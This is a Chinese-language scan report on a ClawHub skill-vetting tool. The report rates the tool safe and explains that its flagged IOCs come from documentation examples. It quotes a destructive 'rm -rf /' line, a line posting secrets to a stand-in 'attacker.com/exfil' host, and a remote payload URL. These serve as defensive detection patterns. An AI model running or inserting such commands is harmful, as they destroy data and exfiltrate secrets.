中文 EN

扫描报告

扫描新文件

可信 — 风险评分 0/100
上次扫描:4 小时前 重新扫描
0 /100
eason-skill-vetting
Vet ClawHub skills for security and utility before installation. Use when considering installing a ClawHub skill, evaluating third-party code, or assessing whether a skill adds value over existing tools.
skill-vetting 是合法的 ClawHub 技能安全审计工具,预扫描标记的所有 IOC 均为文档示例中的误报,无实际恶意行为。
技能名称eason-skill-vetting
分析耗时40.8s
引擎pi
ClawHub Eason Skill Vetting v1.0.0 by eathon
📥 240 📦 2
ClawHub 判定 可疑 dynamic_code_executionllm_suspiciousprompt_injection_instructions
可以安装
可安全安装使用。预扫描中唯一的 CRITICAL IOC(rm -rf / @ references/patterns.md:20)出现在文档示例中,用于说明危险模式,非可执行代码。

安全发现 3 项

严重性 安全发现 位置
提示
预扫描 CRITICAL IOC 为文档示例误报 文档欺骗
references/patterns.md:20 中的 'rm -rf /' 出现在文档的恶意模式示例中,用于教育读者为何 eval()/exec() 是危险模式。这是文档内容,不是可执行代码。预扫描器将其标记为 CRITICAL 是误报。
# RED FLAG\neval(user_input)\nexec(compiled_code)
→ 无需操作。这是文档中的教育性示例,不是实际恶意代码。
 references/patterns.md:20
提示
URL IOC 均为文档示例或合法 ClawHub API 文档欺骗
所有预扫描标记的 URL:clawhub.ai/api/v1/download 是文档中声明的合法 API;attacker.com/exfil 和 random-ip:8080/payload.py 是 references/patterns.md 中作为 SUSPICIOUS ENDPOINTS 示例的占位符,属于模式数据库的教育内容。
requests.post('https://attacker.com/exfil', data=secrets)
→ 无需操作。所有 URL 均属于文档/示例内容,非实际网络请求。
 references/patterns.md:63
提示
scripts/scan.py 无第三方依赖声明 供应链
scan.py 仅使用 Python 3 标准库(os, re, sys, json, base64, pathlib, typing),无需 requirements.txt 或依赖声明文件。无外部依赖引入供应链风险。
import os, re, sys, json, base64, pathlib, typing
→ 无需操作。纯标准库,无第三方依赖风险。
 scripts/scan.py:1
资源类型声明权限推断权限状态证据
文件系统 READ READ ✓ 一致 SKILL.md: scripts/scan.py reads skill files via Read tool
网络访问 READ READ ✓ 一致 SKILL.md: curl download from clawhub.ai/api/v1/download — documented API endpoin…
命令执行 WRITE WRITE ✓ 一致 SKILL.md: python3 scan.py — subprocess invocation for CLI tool; scripts/scan.py …
1 严重 6 项发现
💀
严重 危险命令 危险 Shell 命令
rm -rf /
references/patterns.md:20
🔗
中危 外部 URL 外部 URL
https://clawhub.ai/api/v1/download?slug=SLUG
ARCHITECTURE.md:138
🔗
中危 外部 URL 外部 URL
https://clawhub.ai/api/v1/download?slug=SKILL_NAME
SKILL.md:15
🔗
中危 外部 URL 外部 URL
https://attacker.com/exfil
references/patterns.md:63
🔗
中危 外部 URL 外部 URL
http://random-ip:8080/payload.py
references/patterns.md:64
🔗
中危 外部 URL 外部 URL
https://attacker.com
references/patterns.md:159

目录结构

5 文件 · 30.2 KB · 904 行
Markdown 3f · 667L Python 1f · 232L JSON 1f · 5L
├─ 📁 references
│ └─ 📝 patterns.md Markdown 219L · 4.6 KB
├─ 📁 scripts
│ └─ 🐍 scan.py Python 232L · 9.5 KB
├─ 📋 _meta.json JSON 5L · 138 B
├─ 📝 ARCHITECTURE.md Markdown 297L · 10.8 KB
└─ 📝 SKILL.md Markdown 151L · 5.1 KB

安全亮点

✓ 纯 Python 标准库实现,无第三方依赖引入供应链风险
✓ scan.py 使用纯正则匹配检测恶意模式,逻辑清晰可审计
✓ SKILL.md 包含全面的 prompt injection 警告和教育性文档
✓ SKILL.md 行为与代码实现完全一致,无阴影功能
✓ SKILL.md 明确声明了 download→scan→review 的三步工作流,权限边界清晰
✓ ARCHITECTURE.md 提供了对抗 prompt injection 的分层防御设计文档
✓ Scanner 包含专门的 prompt_injection 检测模式(CRITICAL 级别),有效防御社交工程攻击